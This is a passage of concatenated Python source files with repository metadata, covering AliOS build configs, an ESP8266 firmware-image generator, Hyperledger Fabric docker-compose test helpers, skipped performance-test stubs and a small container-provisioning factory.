""" Get predefined value for keyword from .aos """
value = None
config_file = '.aos'
if not os.path.isfile(config_file):
return value
with open(config_file) as f:
for line in f.readlines():
m = re.match(r'^([\w+-]+)\=(.*)$', line)
if m and m.group(1) == keyword:
value = m.group(2)
return value
```
#### File: linkkit/hal/ucube.py
```python
src =Split('''
HAL_OS_rhino.c
HAL_TCP_rhino.c
HAL_PRODUCT_rhino.c
HAL_UDP_rhino.c
HAL_Crypt_rhino.c
HAL_TLS_mbedtls.c
HAL_DTLS_mbedtls.c
HAL_AWSS_rhino.c
''')
# HAL_TLS_mbedtls.c
# HAL_DTLS_mbedtls.c
component =aos_component('iotx-hal', src)
dependencis =Split('''
security/mbedtls
utility/digest_algorithm
''')
for i in dependencis:
component.add_comp_deps(i)
global_includes =Split('''
''')
for i in global_includes:
component.add_global_includes(i)
global_macros =Split('''
COAP_DTLS_SUPPORT
''')
for i in global_macros:
component.add_global_macros(i)
includes =Split('''
''')
for i in includes:
component.add_includes(i)
cflags =Split('''
''')
for i in cflags:
component.add_cflags(i)
component.add_global_macros('')
@post_config
def alink_ilop_post_config(component):
comp_names = [comp.name for comp in aos_global_config.components]
if 'ywss4linkkit' in comp_names:
component.add_sources('HAL_AWSS_rhino.c')
alink_ilop_post_config(component)
```
#### File: esp8266/tools/gen_appbin.py
```python
import string
import sys
import os
import re
import binascii
import struct
import zlib
TEXT_ADDRESS = 0x40100000
# app_entry = 0
# data_address = 0x3ffb0000
# data_end = 0x40000000
# text_end = 0x40120000
CHECKSUM_INIT = 0xEF
chk_sum = CHECKSUM_INIT
blocks = 0
def write_file(file_name,data):
if file_name is None:
print 'file_name cannot be none\n'
sys.exit(0)
fp = open(file_name,'ab')
if fp:
fp.seek(0,os.SEEK_END)
fp.write(data)
fp.close()
else:
print '%s write fail\n'%(file_name)
def combine_bin(file_name,dest_file_name,start_offset_addr,need_chk):
global chk_sum
global blocks
if dest_file_name is None:
print 'dest_file_name cannot be none\n'
sys.exit(0)
if file_name:
fp = open(file_name,'rb')
if fp:
########## write text ##########
fp.seek(0,os.SEEK_END)
data_len = fp.tell()
if data_len:
if need_chk:
tmp_len = (data_len + 3) & (~3)
else:
tmp_len = (data_len + 15) & (~15)
data_bin = struct.pack('<II',start_offset_addr,tmp_len)
write_file(dest_file_name,data_bin)
fp.seek(0,os.SEEK_SET)
data_bin = fp.read(data_len)
write_file(dest_file_name,data_bin)
if need_chk:
for loop in range(len(data_bin)):
chk_sum ^= ord(data_bin[loop])
# print '%s size is %d(0x%x),align 4 bytes,\nultimate size is %d(0x%x)'%(file_name,data_len,data_len,tmp_len,tmp_len)
tmp_len = tmp_len - data_len
if tmp_len:
data_str = ['00']*(tmp_len)
data_bin = binascii.a2b_hex(''.join(data_str))
write_file(dest_file_name,data_bin)
if need_chk:
for loop in range(len(data_bin)):
chk_sum ^= ord(data_bin[loop])
blocks = blocks + 1
fp.close()
else:
print '!!!Open %s fail!!!'%(file_name)
def getFileCRC(_path):
try:
blocksize = 1024 * 64
f = open(_path,"rb")
str = f.read(blocksize)
crc = 0
while(len(str) != 0):
crc = binascii.crc32(str, crc)
str = f.read(blocksize)
f.close()
except:
print 'get file crc error!'
return 0
return crc
def gen_appbin():
global chk_sum
global crc_sum
global blocks
if len(sys.argv) != 6:
print 'Usage: gen_appbin.py eagle.app.out boot_mode flash_mode flash_clk_div flash_size_map'
sys.exit(0)
elf_file = sys.argv[1]
boot_mode = sys.argv[2]
flash_mode = sys.argv[3]
flash_clk_div = sys.argv[4]
flash_size_map = sys.argv[5]
flash_data_line = 16
data_line_bits = 0xf
irom0text_bin_name = 'eagle.app.v6.irom0text.bin'
text_bin_name = 'eagle.app.v6.text.bin'
data_bin_name = 'eagle.app.v6.data.bin'
rodata_bin_name = 'eagle.app.v6.rodata.bin'
flash_bin_name ='eagle.app.flash.bin'
BIN_MAGIC_FLASH = 0xE9
BIN_MAGIC_IROM = 0xEA
data_str = ''
sum_size = 0
if os.getenv('ESP8266_NM') != None:
nm_cmd = os.getenv('ESP8266_NM')
elif os.getenv('COMPILE')=='xcc' :
nm_cmd = 'xt-nm'
else :
nm_cmd = 'xtensa-lx106-elf-nm'
cmd = '{} -g {} > eagle.app.sym'.format(nm_cmd, elf_file)
os.system(cmd)
fp = file('./eagle.app.sym')
if fp is None:
print "open sym file error\n"
sys.exit(0)
lines = fp.readlines()
fp.close()
entry_addr = None
p = re.compile('(\w*)(\sT\s)(call_user_start)$')
for line in lines:
m = p.search(line)
if m != None:
entry_addr = m.group(1)
# print entry_addr
if entry_addr is None:
print 'no entry point!!'
sys.exit(0)
data_start_addr = '0'
p = re.compile('(\w*)(\sA\s)(_data_start)$')
for line in lines:
m = p.search(line)
if m != None:
data_start_addr = m.group(1)
# print data_start_addr
rodata_start_addr = '0'
p = re.compile('(\w*)(\sA\s)(_rodata_start)$')
for line in lines:
m = p.search(line)
if m != None:
rodata_start_addr = m.group(1)
# print rodata_start_addr
# write flash bin header
#============================
# SPI FLASH PARAMS
#-------------------
#flash_mode=
# 0: QIO
# 1: QOUT
# 2: DIO
# 3: DOUT
#-------------------
#flash_clk_div=
# 0 : 80m / 2
# 1 : 80m / 3
# 2 : 80m / 4
# 0xf: 80m / 1
#-------------------
#flash_size_map=
# 0 : 512 KB (256 KB + 256 KB)
# 1 : 256 KB
# 2 : 1024 KB (512 KB + 512 KB)
# 3 : 2048 KB (512 KB + 512 KB)
# 4 : 4096 KB (512 KB + 512 KB)
# 5 : 2048 KB (1024 KB + 1024 KB)
# 6 : 4096 KB (1024 KB + 1024 KB)
#-------------------
# END OF SPI FLASH PARAMS
#============================
byte2=int(flash_mode)&0xff
byte3=(((int(flash_size_map)<<4)| int(flash_clk_div))&0xff)
if boot_mode == '2':
# write irom bin head
data_bin = struct.pack('<BBBBI',BIN_MAGIC_IROM,4,byte2,byte3,long(entry_addr,16))
sum_size = len(data_bin)
write_file(flash_bin_name,data_bin)
# irom0.text.bin
combine_bin(irom0text_bin_name,flash_bin_name,0x0,0)
data_bin = struct.pack('<BBBBI',BIN_MAGIC_FLASH,3,byte2,byte3,long(entry_addr,16))
sum_size = len(data_bin)
write_file(flash_bin_name,data_bin)
# text.bin
combine_bin(text_bin_name,flash_bin_name,TEXT_ADDRESS,1)
# data.bin
if data_start_addr:
combine_bin(data_bin_name,flash_bin_name,long(data_start_addr,16),1)
# rodata.bin
combine_bin(rodata_bin_name,flash_bin_name,long(rodata_start_addr,16),1)
# write checksum header
sum_size = os.path.getsize(flash_bin_name) + 1
sum_size = flash_data_line - (data_line_bits&sum_size)
if sum_size:
data_str = ['00']*(sum_size)
data_bin = binascii.a2b_hex(''.join(data_str))
write_file(flash_bin_name,data_bin)
write_file(flash_bin_name,chr(chk_sum & 0xFF))
if boot_mode == '1':
sum_size = os.path.getsize(flash_bin_name)
data_str = ['FF']*(0x10000-sum_size)
data_bin = binascii.a2b_hex(''.join(data_str))
write_file(flash_bin_name,data_bin)
fp = open(irom0text_bin_name,'rb')
if fp:
data_bin = fp.read()
write_file(flash_bin_name,data_bin)
fp.close()
else :
print '!!!Open %s fail!!!'%(flash_bin_name)
sys.exit(0)
if boot_mode == '1' or boot_mode == '2':
all_bin_crc = getFileCRC(flash_bin_name)
if all_bin_crc < 0:
all_bin_crc = abs(all_bin_crc) - 1
else :
all_bin_crc = abs(all_bin_crc) + 1
print "bin crc: %x"%all_bin_crc
write_file(flash_bin_name,chr((all_bin_crc & 0x000000FF))+chr((all_bin_crc & 0x0000FF00) >> 8)+chr((all_bin_crc & 0x00FF0000) >> 16)+chr((all_bin_crc & 0xFF000000) >> 24))
cmd = 'rm eagle.app.sym'
os.system(cmd)
if __name__=='__main__':
gen_appbin()
```
#### File: mcu/linux/ucube.py
```python
aos_global_config.set('no_with_lwip', 1)
src = Split('''
soc/uart.c
main/arg_options.c
main/main.c
main/hw.c
main/wifi_port.c
main/ota_port.c
main/nand.c
main/vfs_trap.c
''')
global_cflags = Split('''
-m32
-std=gnu99
-Wall
-Wno-missing-field-initializers
-Wno-strict-aliasing -Wno-address
-Wno-unused-result
-lpthread
-lm
-lrt
-DDEBUG
-ggdb
''')
global_macros = Split('''
SYSINFO_PRODUCT_MODEL=\\"ALI_AOS_LINUXHOST\\"
SYSINFO_DEVICE_NAME=\\"LINUXHOST\\"
CONFIG_AOS_RHINO_MMREGION
CONFIG_YSH_CMD_DUMPSYS
CSP_LINUXHOST
CONFIG_LOGMACRO_DETAILS
CONFIG_AOS_FATFS_SUPPORT
CONFIG_AOS_FATFS_SUPPORT_MMC
CONFIG_AOS_UOTA_BREAKPOINT
''')
component = aos_mcu_component('linuximpl', '', src)
component.set_global_arch('linux')
component.add_global_cflags(*global_cflags)
component.add_global_asflags('-m32')
component.add_global_ldflags('-m32', '-lpthread', '-lm', '-lrt', '-lreadline', '-lncurses')
component.add_global_macros(*global_macros)
@post_config
def linuximpl_post_config(component):
comp_names = [comp.name for comp in aos_global_config.components]
if 'fatfs' in comp_names:
component.add_sources('main/sdmmc.c')
if 'net' in comp_names:
aos_global_config.set('LWIP', 1)
linuximpl_post_config(component)
LWIP = aos_global_config.get('LWIP')
if LWIP == 1:
lwip_src = Split('''
csp/lwip/netif/delif.c
csp/lwip/netif/fifo.c
csp/lwip/netif/list.c
csp/lwip/netif/tapif.c
csp/lwip/netif/tcpdump.c
csp/lwip/netif/tunif.c
csp/lwip/lwip_linuxhost.c
''')
for s in lwip_src:
component.add_sources(s)
### can't work end ###
if aos_global_config.app == 'yts':
src_tmp = Split('''
main/sdmmc.c
csp/lwip/netif/delif.c
csp/lwip/netif/fifo.c
csp/lwip/netif/list.c
csp/lwip/netif/tapif.c
csp/lwip/netif/tcpdump.c
csp/lwip/netif/tunif.c
csp/lwip/lwip_linuxhost.c
''')
for s in src_tmp:
component.add_sources(s)
if aos_global_config.get('osal') == 'posix':
component.add_macros("CONFIG_OSAL_POSIX")
else:
src_tmp = Split('''
soc/soc_impl.c
soc/hook_impl.c
soc/trace_impl.c
''')
for s in src_tmp:
component.add_sources(s)
component.add_comp_deps('utility/log', 'platform/arch/linux', 'osal', 'kernel/init')
component.add_global_includes('include', 'csp/lwip/include')
``` |
{
"source": "jinlongliu/fabric-alpha2",
"score": 2
} |
#### File: bddtests/steps/compose.py
```python
import os
import uuid
import bdd_test_util
from contexthelper import ContextHelper
import json
from abc import ABCMeta, abstractmethod
class ContainerData:
def __init__(self, containerName, ipAddress, envFromInspect, composeService, ports):
self.containerName = containerName
self.ipAddress = ipAddress
self.envFromInspect = envFromInspect
self.composeService = composeService
self.ports = ports
def getEnv(self, key):
envValue = None
for val in self.envFromInspect:
if val.startswith(key):
envValue = val[len(key):]
break
if envValue == None:
raise Exception("ENV key not found ({0}) for container ({1})".format(key, self.containerName))
return envValue
class CompositionCallback:
__metaclass__ = ABCMeta
@abstractmethod
def composing(self, composition, context):
pass
@abstractmethod
def decomposing(self, composition, context):
pass
@abstractmethod
def getEnv(self, composition, context, env):
pass
class Test(CompositionCallback):
def composing(self, composition, context):
pass
def decomposing(self, composition, context):
pass
def getEnv(self, composition, context, env):
pass
def GetDockerSafeUUID():
return str(uuid.uuid1()).replace('-','')
class Composition:
@classmethod
def RegisterCallbackInContext(cls, context, callback):
if not isinstance(callback, CompositionCallback):
raise TypeError("Expected type to be {0}, instead received {1}".format(CompositionCallback, type(callback)))
Composition.GetCompositionCallbacksFromContext(context).append(callback)
@classmethod
def GetCompositionCallbacksFromContext(cls, context):
if not "compositionCallbacks" in context:
context.compositionCallbacks = []
return context.compositionCallbacks
@classmethod
def GetUUID(cls):
return GetDockerSafeUUID()
def __init__(self, context, composeFilesYaml, projectName=None,
force_recreate=True, components=[], register_and_up=True):
self.contextHelper = ContextHelper.GetHelper(context=context)
if not projectName:
projectName = self.contextHelper.getGuuid()
self.projectName = projectName
self.context = context
self.containerDataList = []
self.composeFilesYaml = composeFilesYaml
self.serviceNames = []
self.serviceNames = self._collectServiceNames()
if register_and_up:
# Register with contextHelper (Supports docgen)
self.contextHelper.registerComposition(self)
[callback.composing(self, context) for callback in Composition.GetCompositionCallbacksFromContext(context)]
self.up(context, force_recreate, components)
def _collectServiceNames(self):
'First collect the services names.'
servicesList = [service for service in self.issueCommand(["config", "--services"]).splitlines() if "WARNING" not in service]
return servicesList
def up(self, context, force_recreate=True, components=[]):
self.serviceNames = self._collectServiceNames()
command = ["up", "-d"]
if force_recreate:
command += ["--force-recreate"]
self.issueCommand(command + components)
def scale(self, context, serviceName, count=1):
self.serviceNames = self._collectServiceNames()
command = ["scale", "%s=%d" %(serviceName, count)]
self.issueCommand(command)
def stop(self, context, components=[]):
self.serviceNames = self._collectServiceNames()
command = ["stop"]
self.issueCommand(command, components)
def start(self, context, components=[]):
self.serviceNames = self._collectServiceNames()
command = ["start"]
self.issueCommand(command, components)
def getServiceNames(self):
return list(self.serviceNames)
def parseComposeFilesArg(self, composeFileArgs):
args = [arg for sublist in [["-f", file] for file in [file if not os.path.isdir(file) else os.path.join(file, 'docker-compose.yml') for file in composeFileArgs.split()]] for arg in sublist]
return args
def getFileArgs(self):
return self.parseComposeFilesArg(self.composeFilesYaml)
def getEnvAdditions(self):
myEnv = {}
myEnv["COMPOSE_PROJECT_NAME"] = self.projectName
myEnv["CORE_PEER_NETWORKID"] = self.projectName
# Invoke callbacks
[callback.getEnv(self, self.context, myEnv) for callback in Composition.GetCompositionCallbacksFromContext(self.context)]
return myEnv
def getEnv(self):
myEnv = os.environ.copy()
for key,value in self.getEnvAdditions().iteritems():
myEnv[key] = value
# myEnv["COMPOSE_PROJECT_NAME"] = self.projectName
# myEnv["CORE_PEER_NETWORKID"] = self.projectName
# # Invoke callbacks
# [callback.getEnv(self, self.context, myEnv) for callback in Composition.GetCompositionCallbacksFromContext(self.context)]
return myEnv
def getConfig(self):
return self.issueCommand(["config"])
def refreshContainerIDs(self):
containers = self.issueCommand(["ps", "-q"]).split()
return containers
def _callCLI(self, argList, expect_success, env):
return bdd_test_util.cli_call(argList, expect_success=expect_success, env=env)
def issueCommand(self, command, components=[]):
componentList = []
useCompose = True
for component in components:
if '_' in component:
useCompose = False
componentList.append("%s_%s" % (self.projectName, component))
else:
break
# If we need to perform an operation on a specific container, use
# docker not docker-compose
if useCompose:
cmdArgs = self.getFileArgs()+ command + components
cmd = ["docker-compose"] + cmdArgs
else:
cmdArgs = command + componentList
cmd = ["docker"] + cmdArgs
#print("cmd:", cmd)
output, error, returncode = \
self._callCLI(cmd, expect_success=True, env=self.getEnv())
# Don't rebuild if ps command
if command[0] !="ps" and command[0] !="config":
self.rebuildContainerData()
return output
def rebuildContainerData(self):
self.containerDataList = []
for containerID in self.refreshContainerIDs():
# get container metadata
container = json.loads(bdd_test_util.cli_call(["docker", "inspect", containerID], expect_success=True)[0])[0]
# container name
container_name = container['Name'][1:]
# container ip address (only if container is running)
container_ipaddress = None
if container['State']['Running']:
container_ipaddress = container['NetworkSettings']['IPAddress']
if not container_ipaddress:
# ipaddress not found at the old location, try the new location
container_ipaddress = container['NetworkSettings']['Networks'].values()[0]['IPAddress']
# container environment
container_env = container['Config']['Env']
# container exposed ports
container_ports = container['NetworkSettings']['Ports']
# container docker-compose service
container_compose_service = container['Config']['Labels']['com.docker.compose.service']
self.containerDataList.append(ContainerData(container_name, container_ipaddress, container_env, container_compose_service, container_ports))
def decompose(self):
self.issueCommand(["unpause"])
self.issueCommand(["down"])
self.issueCommand(["kill"])
self.issueCommand(["rm", "-f"])
# Now remove associated chaincode containers if any
output, error, returncode = \
bdd_test_util.cli_call(["docker"] + ["ps", "-qa", "--filter", "name={0}".format(self.projectName)], expect_success=True, env=self.getEnv())
for containerId in output.splitlines():
output, error, returncode = \
bdd_test_util.cli_call(["docker"] + ["rm", "-f", containerId], expect_success=True, env=self.getEnv())
# Remove the associated network
output, error, returncode = \
bdd_test_util.cli_call(["docker"] + ["network", "ls", "-q", "--filter", "name={0}".format(self.projectName)], expect_success=True, env=self.getEnv())
for networkId in output.splitlines():
output, error, returncode = \
bdd_test_util.cli_call(["docker"] + ["network", "rm", networkId], expect_success=True, env=self.getEnv())
# Invoke callbacks
[callback.decomposing(self, self.context) for callback in Composition.GetCompositionCallbacksFromContext(self.context)]
```
#### File: regression/daily/test_pte.py
```python
import unittest
import subprocess
TEST_PASS_STRING="RESULT=PASS"
######################################################################
### LEVELDB
######################################################################
class LevelDB_Perf_Stress(unittest.TestCase):
@unittest.skip("skipping")
def test_FAB3584_SkeletonQueries(self):
'''
FAB-2032,FAB-3584
Network: 1 Ord, 1 KB, 1 ZK, 2 Org, 2 Peers, 1 Chan, 1 CC
Launch skeleton network, use PTE in STRESS mode to continuously
send 10000 query transactions concurrently to 1 peer in both orgs,
calculate tps, and remove network and cleanup
'''
# Replace TestPlaceholder.sh with actual test name, something like:
# ../../tools/PTE/tests/runSkeletonQueriesLevel.sh
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3586_SkeletonInvokes(self):
'''
FAB-2032,FAB-3586
Network: 1 Ord, 1 KB, 1 ZK, 2 Org, 2 Peers, 1 Chan, 1 CC
Launch skeleton network, use PTE in STRESS mode to continuously
send 10000 query transactions concurrently to 1 peer in both orgs,
query the ledger to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3593_Standard_basic_TLS(self):
'''
FAB-2032,FAB-3593
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3595_Standard_basic_1M(self):
'''
FAB-2032,FAB-3595
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3597_Standard_basic_Gossip(self):
'''
FAB-2032,FAB-3597
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3599_Standard_12Hr(self):
'''
FAB-2032,FAB-3599
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
######################################################################
### COUCHDB
######################################################################
class CouchDB_Perf_Stress(unittest.TestCase):
@unittest.skip("skipping")
def test_FAB3585_SkeletonQueries(self):
'''
FAB-2032,FAB-3585
Network: 1 Ord, 1 KB, 1 ZK, 2 Org, 2 Peers, 1 Chan, 1 CC
Launch skeleton network, use PTE in STRESS mode to continuously
send 10000 query transactions concurrently to 1 peer in both orgs,
calculate tps, and remove network and cleanup
'''
# Replace TestPlaceholder.sh with actual test name, something like:
# ../../tools/PTE/tests/runSkeletonQueriesCouch.sh
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3587_SkeletonInvokes(self):
'''
FAB-2032,FAB-3587
Network: 1 Ord, 1 KB, 1 ZK, 2 Org, 2 Peers, 1 Chan, 1 CC
Launch skeleton network, use PTE in STRESS mode to continuously
send 10000 query transactions concurrently to 1 peer in both orgs,
query the ledger to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3588_Scaleup1(self):
'''
FAB-2032,FAB-3588
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 20 Chan, 2 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3589_Scaleup2(self):
'''
FAB-2032,FAB-3589
Network: 2 Ord, 5 KB, 3 ZK, 4 Org, 8 Peers, 40 Chan, 4 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3590_Scaleup3(self):
'''
FAB-2032,FAB-3590
Network: 2 Ord, 5 KB, 3 ZK, 8 Org, 16 Peers, 80 Chan, 8 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3591_Scaleup4(self):
'''
FAB-2032,FAB-3591
Network: 4 Ord, 5 KB, 3 ZK, 16 Org, 32 Peers, 160 Chan, 16 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3592_Scaleup5(self):
'''
FAB-2032,FAB-3592
Network: 4 Ord, 5 KB, 3 ZK, 32 Org, 64 Peers, 320 Chan, 32 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3594_Standard_basic_TLS(self):
'''
FAB-2032,FAB-3594
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3596_Standard_basic_1M(self):
'''
FAB-2032,FAB-3596
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3598_Standard_basic_Gossip(self):
'''
FAB-2032,FAB-3598
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3600_Standard_12Hr(self):
'''
FAB-2032,FAB-3600
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
``` |
{
"source": "jinlongwang/interpolation",
"score": 3
} |
#### File: jinlongwang/interpolation/myExcept.py
```python
class MyError(Exception):
pass
class ArgumentsException(MyError):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return "argument error %s" % self.msg
``` |
{
"source": "JinlongWukong/DevLab-ansible",
"score": 2
} |
#### File: DevLab-ansible/container/__init__.py
```python
from .jenkins import Jenkins
from .mysql import Mysql
from .postgres import Postgres
from .container import Container
class ContainerFactory(object):
@staticmethod
def new_container(host_ip, host_user, host_pass, name, cpus, memory, container_type, version):
if container_type == 'jenkins':
return Jenkins(host_ip, host_user, host_pass, name, cpus, memory, container_type, version)
elif container_type == 'mysql':
return Mysql(host_ip, host_user, host_pass, name, cpus, memory, container_type, version)
elif container_type == 'postgres':
return Postgres(host_ip, host_user, host_pass, name, cpus, memory, container_type, version)
elif container_type in ['redis', 'mongodb', 'influxdb', 'prometheus', 'grafana']:
return Container(host_ip, host_user, host_pass, name, cpus, memory, container_type, version)
else:
raise TypeError("Unknown container type")
```
#### File: DevLab-ansible/container/jenkins.py
```python
from .container import Container
class Jenkins(Container):
def create(self):
"""
Jenkins specified create method, will parse initialAdminPassword
:return: container status(address, port_mapping, initial admin password), data format -> dict
"""
self.callback = self._create()
self.read_admin_password()
return {
"status": self.status,
"address": self.address,
"port_mapping": self.port_mapping,
"additional_infor": {"admin_password": <PASSWORD>} if self.initialAdminPassword else {}
}
def get(self):
"""Get jenkins status information
return: container status, address, port_mapping, format dict
"""
self.callback = self._get()
self.read_admin_password()
return {
"status": self.status,
"address": self.address,
"port_mapping": self.port_mapping,
"additional_infor": {"admin_password": <PASSWORD>} if self.initialAdminPassword else {}
}
def read_admin_password(self):
"""
Read jenkins initial admin password
"""
self.initialAdminPassword = ""
for event in self.callback.host_ok:
if event['task'] == "Get jenkins initialAdminPassword" and event['host'] == self.host_ip:
self.initialAdminPassword = event['result']['stdout']
else:
pass
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.